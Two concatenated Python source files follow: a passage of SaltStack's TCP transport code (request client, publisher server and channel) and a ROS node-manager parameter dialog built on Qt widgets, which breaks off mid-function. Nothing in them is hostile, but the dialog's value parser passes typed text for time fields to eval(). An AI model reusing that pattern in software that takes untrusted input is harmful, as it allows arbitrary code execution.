# self._connecting_future.set_exception(exc)
@salt.ext.tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(
4096, partial=True
)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg["head"]
body = framed_msg["body"]
message_id = header.get("mid")
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error(
"Got response for message_id %s that we are not"
" tracking",
message_id,
)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug(
"tcp stream to %s:%s closed, unable to recv",
self.host,
self.port,
)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if "detect_mode" in self.opts:
log.info(
"There was an error trying to use TCP transport; "
"attempting to fallback to another transport"
)
else:
raise SaltClientError
except Exception as e: # pylint: disable=broad-except
log.error("Exception parsing response", exc_info=True)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@salt.ext.tornado.gen.coroutine
def _stream_send(self):
while (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# If the connection is dead, fail this send and make sure we
# attempt to reconnect.
except salt.ext.tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception("Unable to find available messageid")
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
"""
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id, msg):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
future = self.send_future_map.pop(message_id)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
if future.attempts < future.tries:
future.attempts += 1
log.debug(
"SaltReqTimeoutError, retrying. (%s/%s)",
future.attempts,
future.tries,
)
self.send(
msg,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError("Message timed out"))
def send(self, msg, timeout=None, callback=None, raw=False, future=None, tries=3):
"""
Send given message, and return a future
"""
message_id = self._message_id()
header = {"mid": message_id}
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message_id, msg
)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append(
(message_id, salt.transport.frame.frame_msg(msg, header=header))
)
return future
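# Illustrative flow (assumption about typical use, not original code):
#     future = client.send({"cmd": "ping"}, timeout=30)
#     reply = yield future
# send() queues a framed message with a "mid" header; _stream_return() resolves
# the matching future from send_future_map when a response with that "mid"
# arrives, and timeout_message() fails or retries it if no response shows up
# within the timeout.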
class Subscriber:
"""
Client object for use with the TCP publisher server
"""
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(salt.ext.tornado.tcpserver.TCPServer):
"""
TCP publisher
"""
def __init__(self, opts, io_loop=None):
super().__init__(ssl_options=opts.get("ssl"))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.event = None
self.presence_events = False
if self.opts.get("presence_events", False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != "tcp":
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
"master", opts=self.opts, listen=False
)
else:
self.event = None
def close(self):
if self._closing:
return
self._closing = True
if self.event is not None:
self.event.destroy()
self.event = None
if self.aes_funcs is not None:
self.aes_funcs.destroy()
self.aes_funcs = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {"new": [id_], "lost": []}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {"new": [], "lost": [id_]}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
@salt.ext.tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
body = framed_msg["body"]
if body["enc"] != "aes":
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
load = crypticle.loads(body["load"])
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load["id"], load["tok"]):
continue
client.id_ = load["id"]
self._add_client_present(client)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug("tcp stream to %s closed, unable to recv", client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e: # pylint: disable=broad-except
log.error(
"Exception parsing response from %s", client.address, exc_info=True
)
continue
def handle_stream(self, stream, address):
log.trace("Subscriber at %s connected", address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@salt.ext.tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug("TCP PubServer sending payload: %s", package)
payload = salt.transport.frame.frame_msg(package["payload"])
to_remove = []
if "topic_lst" in package:
topic_lst = package["topic_lst"]
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug("Publish target %s not connected", topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug(
"Subscriber at %s has disconnected from publisher", client.address
)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace("TCP PubServer finished publishing payload")
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state["secrets"]
self.__init__(state["opts"])
def __getstate__(self):
return {"opts": self.opts, "secrets": salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get("log_queue")
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get("log_queue_level")
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts["interface"], int(self.opts["publish_port"])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
finally:
pull_sock.close()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
"""
Publish "load" to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
# Use the Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
# TODO: switch to the actual asynchronous interface
# pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,),
loop_kwarg="io_loop",
)
pub_sock.connect()
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list" and not self.opts.get("order_masters", False):
if isinstance(load["tgt"], str):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(
load["tgt"], tgt_type=load["tgt_type"]
)
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send the list of minions through so the transport can target them
int_payload["topic_lst"] = match_ids
else:
int_payload["topic_lst"] = load["tgt"]
# Send it over IPC!
pub_sock.send(int_payload)
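# Summary (added for clarity): publish() encrypts and serializes the load,
# then pushes it over the local IPC pull socket that _publish_daemon() set up;
# PubServer.publish_payload() finally fans the framed payload out to every
# connected Subscriber (or only to the minions listed in "topic_lst").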
parameter_dialog.py
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, absolute_import, print_function
# unicode_literals is not imported to avoid problems when publishing to ROS topics
from python_qt_binding.QtCore import Qt, Signal, QPoint, QSize
from python_qt_binding.QtGui import QBrush, QColor, QIcon, QPalette
from xmlrpclib import Binary
import os
import roslib.msgs
import roslib.names
import rospy
import ruamel.yaml
import sys
import threading
import traceback
from fkie_node_manager_daemon.common import utf8
from fkie_node_manager.detailed_msg_box import MessageBox
from fkie_node_manager.editor.line_edit import EnhancedLineEdit
from fkie_node_manager.parameter_handler import ParameterHandler
import fkie_node_manager as nm
try:
from python_qt_binding.QtGui import QApplication, QComboBox, QCheckBox, QLineEdit, QScrollArea, QWidget
from python_qt_binding.QtGui import QFormLayout, QHBoxLayout, QVBoxLayout, QSpacerItem, QSizePolicy
from python_qt_binding.QtGui import QFrame, QDialog, QDialogButtonBox, QFileDialog, QLabel, QPushButton, QTextEdit
except Exception:
from python_qt_binding.QtWidgets import QApplication, QComboBox, QCheckBox, QLineEdit, QScrollArea, QWidget
from python_qt_binding.QtWidgets import QFormLayout, QHBoxLayout, QVBoxLayout, QSpacerItem, QSizePolicy
from python_qt_binding.QtWidgets import QFrame, QDialog, QDialogButtonBox, QFileDialog, QLabel, QPushButton, QTextEdit
def str2bool(val):
return val.lower() in ("yes", "true", "t", "1")
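# Example behaviour (added for illustration):
#     str2bool("Yes") -> True, str2bool("1") -> True,
#     str2bool("false") -> False, str2bool("0") -> False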
class MyComboBox(QComboBox):
'''
Supports removing items by pressing Shift+Delete.
'''
remove_item_signal = Signal(str)
def __init__(self, parent=None):
QComboBox.__init__(self, parent=parent)
def keyPressEvent(self, event):
key_mod = QApplication.keyboardModifiers()
if key_mod & Qt.ShiftModifier and (event.key() == Qt.Key_Delete):
try:
curr_text = self.currentText()
if curr_text:
for i in range(self.count()):
if curr_text == self.itemText(i):
self.removeItem(i)
self.remove_item_signal.emit(curr_text)
self.clearEditText()
except Exception:
print(traceback.format_exc(1))
QComboBox.keyPressEvent(self, event)
class ValueWidget(QWidget):
'''
Widget for editing a single parameter value. Shows the input widget itself,
an optional help/hint label and a warning label for invalid input.
'''
def __init__(self, parameter_description, parent=None):
QWidget.__init__(self, parent=parent)
self.parameter_description = parameter_description
self._value_widget = None
self.warn_label = QLabel(parent=self)
self.help_label = QLabel(parameter_description.hint, parent=self)
vw = QWidget(self)
hlayout = QHBoxLayout(vw)
hlayout.setContentsMargins(0, 0, 0, 0)
hlayout.addWidget(self._create_input_widget())
if parameter_description.hint:
# add help button if hint is available
self.help_button = QPushButton(QIcon(':/icons/info.png'), '')
self.help_button.setFlat(True)
self.help_button.setMaximumSize(20, 20)
self.help_button.setCheckable(True)
self.help_button.toggled.connect(self._on_help_toggled)
hlayout.addWidget(self.help_button)
vlayout = QVBoxLayout(self)
vlayout.setContentsMargins(0, 0, 0, 0)
vlayout.setSpacing(1)
vlayout.addWidget(vw)
# add label to show warnings on wrong input value
self.warn_label.setWordWrap(True)
vlayout.addWidget(self.warn_label)
self.warn_label.setVisible(False)
self.warn_label.setStyleSheet("QLabel { color: %s;}" % QColor(255, 83, 13).name())
# help label
self.help_label.setWordWrap(True)
self.help_label.setStyleSheet("QLabel { background: %s;}" % QColor(255, 255, 235).name())
vlayout.addWidget(self.help_label)
self.help_label.setVisible(False)
def current_text(self):
result = ''
if isinstance(self._value_widget, QCheckBox):
result = repr(self._value_widget.isChecked())
elif isinstance(self._value_widget, MyComboBox):
result = self._value_widget.currentText()
elif isinstance(self._value_widget, QLineEdit):
result = self._value_widget.text()
elif isinstance(self._value_widget, QLabel):
result = self._value_widget.text()
return result
def set_value(self, value):
if isinstance(self._value_widget, QCheckBox):
bval = value
if not isinstance(value, bool):
bval = str2bool(value[0] if isinstance(value, list) else value)
self._value_widget.setChecked(bval)
elif isinstance(self._value_widget, MyComboBox):
self._value_widget.setEditText(', '.join([utf8(v) for v in value]) if isinstance(value, list) else utf8(value))
elif isinstance(self._value_widget, QLabel):
self._value_widget.setText(value)
elif isinstance(self._value_widget, QLineEdit):
# avoid ' or " that escapes the string values
self._value_widget.setText(', '.join([utf8(v) for v in value]) if isinstance(value, list) else utf8(value))
def add_cached_values(self):
if isinstance(self._value_widget, MyComboBox):
fullname = self.parameter_description.fullName()
values = nm.history().cachedParamValues(fullname)
for i in range(self._value_widget.count()):
try:
values.remove(self._value_widget.itemText(i))
except ValueError:
pass
except Exception:
print(traceback.format_exc())
if self._value_widget.count() == 0:
values.insert(0, '')
self._value_widget.addItems(values)
def _create_input_widget(self):
pd = self.parameter_description
value = pd._value
if 'bool' in pd.baseType():
# add checkbox to edit boolean value
cb = QCheckBox(parent=self)
cb.setObjectName(pd.name())
if not isinstance(value, bool):
value = str2bool(value[0] if isinstance(value, list) else value)
pd._value_org = value
cb.setChecked(value)
cb.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))
cb.setMinimumHeight(20)
self._value_widget = cb
return cb
elif pd.read_only:
# read only value are added as label
label = QLabel(value, parent=self)
label.setMinimumHeight(20)
label.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))
self._value_widget = label
return label
else:
# all other are added as combobox
cb = MyComboBox(parent=self)
cb.setObjectName(pd.name())
cb.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))
cb.setEditable(True)
cb.remove_item_signal.connect(pd.removeCachedValue)
cb.editTextChanged.connect(self._check_text)
items = []
if isinstance(value, list):
if pd.isArrayType():
items.append(','.join([utf8(val) for val in value]))
else:
items[len(items):] = value
else:
if value is not None and value:
items.append(utf8(value) if not isinstance(value, Binary) else '{binary data!!! updates will be ignored!!!}')
elif pd.isTimeType():
items.append('now')
if ':alt' in pd._tags:
# add alternative values
try:
for alt_value in pd._tags[':alt']:
if alt_value not in items:
items.append(alt_value)
except Exception as err:
rospy.logwarn('Can not add alternative values to %s: %s' % (pd.name(), utf8(err)))
pd._value_org = items[0] if items else ''
cb.addItems(items)
self._value_widget = cb
if pd.path_type:
# add path editor if path type is defined
fd = QWidget(self)
hlayout = QHBoxLayout(fd)
hlayout.setContentsMargins(0, 0, 0, 0)
hlayout.addWidget(cb)
self.path_button = QPushButton('...')
self.path_button.setFlat(True)
self.path_button.setMaximumSize(20, 20)
self.path_button.clicked.connect(self._on_file_dialog_clicked)
hlayout.addWidget(self.path_button)
return fd
else:
return cb
def _check_text(self, text=''):
'''
Checks the content of the combobox for valid type
'''
try:
self.parameter_description.updateValue(text)
# self.combobox.setStyleSheet('')
self.warn_label.setVisible(False)
except Exception as err:
self.warn_label.setText(utf8(err))
# bg_style = "MyComboBox { background: %s;}" % QColor(255, 83, 13).name()
# self.combobox.setStyleSheet("%s" % (bg_style))
self.warn_label.setVisible(True)
def _on_file_dialog_clicked(self):
# Workaround for QFileDialog.getExistingDirectory because it does not
# preselect the configuration folder in the dialog
self.dialog = QFileDialog(self, caption=self.parameter_description.hint)
self.dialog.setOption(QFileDialog.HideNameFilterDetails, True)
if self.parameter_description.path_type == 'dir':
self.dialog.setFileMode(QFileDialog.Directory)
self.dialog.setDirectory(self._value_widget.currentText())
if self.dialog.exec_():
fileNames = self.dialog.selectedFiles()
self._value_widget.setEditText(fileNames[0])
def _on_help_toggled(self, checked):
self.help_label.setVisible(checked)
class ParameterDescription(object):
'''
Used for the internal representation of a parameter in the dialog.
'''
def __init__(self, name, msg_type, value=None, widget=None):
self._name = str(name)
self._type = msg_type
self._value = None
self._value_org = None
self.read_only = False
self.path_type = ''
self.hint = ''
self._min = None
self._max = None
self._tags = {}
self._read_value(value)
self._widget = widget
try:
self._base_type, self._is_array_type, self._array_length = roslib.msgs.parse_type(self._type)
except Exception:
pass
if msg_type == 'binary':
self._base_type = msg_type
def _read_value(self, value):
if isinstance(value, dict):
for key, val in value.items():
if key.startswith(':'):
if key == ':value':
self._value = val
self._value_org = val
elif key == ':ro':
self.read_only = val
elif key == ':hint':
self.hint = val
elif key == ':path':
self.path_type = val
elif key == ':min':
self._min = val
elif key == ':max':
self._max = val
self._tags[key] = val
else:
self._value = value
self._value_org = value
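# Note (added for clarity): when the value is a dict, keys starting with ':'
# are meta tags of this parameter (':value', ':ro', ':hint', ':path', ':min',
# ':max', plus tags such as ':alt' and ':type' used elsewhere) and are stored
# in self._tags; a non-dict value is stored directly as the parameter value.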
def __repr__(self):
return "%s [%s]: %s" % (self._name, self._type, utf8(self._value))
@classmethod
def is_primitive_type(cls, value_type):
result = value_type in roslib.msgs.PRIMITIVE_TYPES
result = result or value_type in ['string', 'int', 'float', 'time', 'duration', 'binary', 'unicode']
return result
def add_tag(self, key, value):
self._tags[key] = value
def origin_value(self):
return self._value_org
def clear_origin_value(self):
self._value_org = None
def changed(self):
return utf8(self.origin_value()) != utf8(self._value)
def name(self):
return self._name
def setWidget(self, widget):
self._widget = widget
if widget is not None:
self.addCachedValuesToWidget()
def widget(self):
return self._widget
def fullName(self):
result = self.name()
widget = self._widget
while widget is not None:
if isinstance(widget, (MainBox, GroupBox, ArrayBox)):
result = roslib.names.ns_join(widget.name, result)
widget = widget.parent()
return result
def isArrayType(self):
# handle representation of `rosparam`
return self._is_array_type or (self._type in ['[]'])
def arrayLength(self):
return self._array_length
def isPrimitiveType(self):
result = self.is_primitive_type(self._base_type)
# if value is a string, the list is represented as a string, see `rosparam`
result = result or self._type in ['[]']
return result
def isTimeType(self):
return self._base_type in ['time', 'duration']
def isBinaryType(self):
return self._base_type in ['binary']
def baseType(self):
return self._base_type
def msgType(self):
return self._type
def updateValueFromField(self):
if self.read_only:
# do not change any values
return
result = self.widget().current_text()
self._value = self.updateValue(result, raise_on_min_max=False)
if self.changed():
nm.history().addParamCache(self.fullName(), self._value)
def updateValue(self, value, raise_on_min_max=True):
rvalue = value
try:
if isinstance(value, (dict, list)):
rvalue = value
elif value:
if self.isArrayType():
if 'int' in self.baseType() or 'byte' in self.baseType():
rvalue = list(map(int, value.lstrip('[').rstrip(']').split(',')))
elif 'float' in self.baseType():
rvalue = list(map(float, value.lstrip('[').rstrip(']').split(',')))
elif 'bool' in self.baseType():
rvalue = list(map(str2bool, value.lstrip('[').rstrip(']').split(',')))
elif self.isBinaryType():
rvalue = value
else:
try:
rvalue = value.lstrip('[').rstrip(']')
rvalue = ruamel.yaml.load("[%s]" % rvalue, Loader=ruamel.yaml.Loader)
# if there is no YAML content, load() may return None;
# use an empty list instead as our representation of an
# empty value.
if rvalue is None:
rvalue = []
except ruamel.yaml.MarkedYAMLError as e:
raise Exception("Field [%s] yaml error: %s" % (self.fullName(), utf8(e)))
if self.arrayLength() is not None and self.arrayLength() != len(rvalue):
raise Exception(''.join(["Field [", self.fullName(), "] has incorrect number of elements: ", utf8(len(rvalue)), " != ", str(self.arrayLength())]))
else:
if 'int' in self.baseType() or 'byte' in self.baseType():
rvalue = int(value)
elif 'float' in self.baseType():
rvalue = float(value)
elif 'bool' in self.baseType():
if isinstance(value, bool):
rvalue = value
else:
rvalue = str2bool(value)
elif self.isBinaryType():
rvalue = utf8(value)
elif self.isTimeType():
if value == 'now':
rvalue = 'now'
else:
try:
val = eval(value)
if isinstance(val, dict):
rvalue = val
else:
secs = int(val)
nsecs = int((val - secs) * 1000000000)
rvalue = {'secs': secs, 'nsecs': nsecs}
except Exception:
rvalue = {'secs': 0, 'nsecs': 0}
else:
rvalue = value.encode(sys.getfilesystemencoding())
else:
if self.isArrayType():
arr = []
rvalue = arr
else:
if 'int' in self.baseType() or 'byte' in self.baseType():
rvalue = 0
elif 'float' in self.baseType():
rvalue = 0.0
elif 'bool' in self.baseType():
rvalue = False
elif self.isBinaryType():
rvalue = utf8(value)
elif self.isTimeType():
rvalue = {'secs': 0, 'nsecs': 0}
else:
rvalue = ''
except Exception as e:
raise Exception("Error while set value '%s', for '%s': %s" % (utf8(value), self.fullName(), utf8(e)))
if self._min is not None:
if rvalue < self._min:
if raise_on_min_max:
raise Exception("%s is smaller than minimum: %s" % (utf8(rvalue), utf8(self._min)))
rvalue = self._min
if self._max is not None:
if rvalue > self._max:
if raise_on_min_max:
raise Exception("%s is greater than maximum: %s" % (utf8(rvalue), utf8(self._max)))
rvalue = self._max
return rvalue
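# Rough examples of the conversion above (added for illustration):
#     base type 'int32',    value '3'     -> 3
#     base type 'float64',  value '1.5'   -> 1.5
#     array type 'int32[]', value '1,2,3' -> [1, 2, 3]
#     time/duration type,   value 'now'   -> 'now'
# Values below self._min or above self._max either raise or are clamped,
# depending on raise_on_min_max.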
def value(self, with_tags=False):
if not self.isPrimitiveType() and not self.widget() is None:
return self.widget().value(with_tags)
elif self.isPrimitiveType():
self.updateValueFromField()
if with_tags:
result = {}
result.update(self._tags)
result[':value'] = self._value
return result
return self._value
def removeCachedValue(self, value):
nm.history().removeParamCache(self.fullName(), value)
def createTypedWidget(self, parent):
result = None
if self.isPrimitiveType():
result = ValueWidget(self, parent)
else:
if self.isArrayType():
result = ArrayBox(self.name(), self._type, dynamic=self.arrayLength() is None, parent=parent)
else:
result = GroupBox(self.name(), self._type, parent=parent)
return result
def addCachedValuesToWidget(self):
if isinstance(self.widget(), ValueWidget):
self.widget().add_cached_values()
class MainBox(QFrame):
'''
Groups the parameters without visualizing the group. It is the main widget.
'''
def __init__(self, name, param_type, collapsible=True, parent=None):
QFrame.__init__(self, parent)
self.setObjectName(name)
self.name = name
self.type_msg = param_type
self.params = []
self.collapsed = False
self.parameter_description = None
vLayout = QVBoxLayout(self)
vLayout.setContentsMargins(1, 1, 1, 1)
vLayout.setSpacing(1)
self.param_widget = QFrame(self)
self.collapsible = collapsible
if collapsible:
self.options_layout = QHBoxLayout()
self.options_layout.setContentsMargins(1, 1, 1, 1)
self.options_layout.setSpacing(1)
self.hide_button = QPushButton('-')
self.hide_button.setFlat(True)
self.hide_button.setMaximumSize(20, 20)
self.hide_button.clicked.connect(self._on_hide_clicked)
self.name_label = QLabel(name)
font = self.name_label.font()
font.setBold(True)
self.name_label.setFont(font)
self.options_layout.addWidget(self.hide_button)
self.options_layout.addWidget(self.name_label)
self.type_label = QLabel('(%s)' % param_type)
self.options_layout.addWidget(self.type_label)
self.options_layout.addStretch()
vLayout.addLayout(self.options_layout)
self.param_widget.setFrameShape(QFrame.StyledPanel)
self.param_widget.setFrameShadow(QFrame.Sunken)
boxLayout = QFormLayout(self.param_widget)
boxLayout.setContentsMargins(3, 3, 3, 3)
boxLayout.setVerticalSpacing(1)
vLayout.addWidget(self.param_widget)
if param_type in ['std_msgs/Header']:
self.setCollapsed(True)
def setCollapsed(self, value):
self.collapsed = value
self.param_widget.setVisible(not value)
self.hide_button.setText('+' if self.collapsed else '-')
def _on_hide_clicked(self):
self.setCollapsed(not self.collapsed)
# self.param_widget.setVisible(not self.param_widget.isVisible())
# vis = self.param_widget.isVisible()
# self.hide_button.setText('-' if vis else '+')
def createFieldFromValue(self, value, clear_origin_value=False):
self.setUpdatesEnabled(False)
try:
if isinstance(value, (dict, list)):
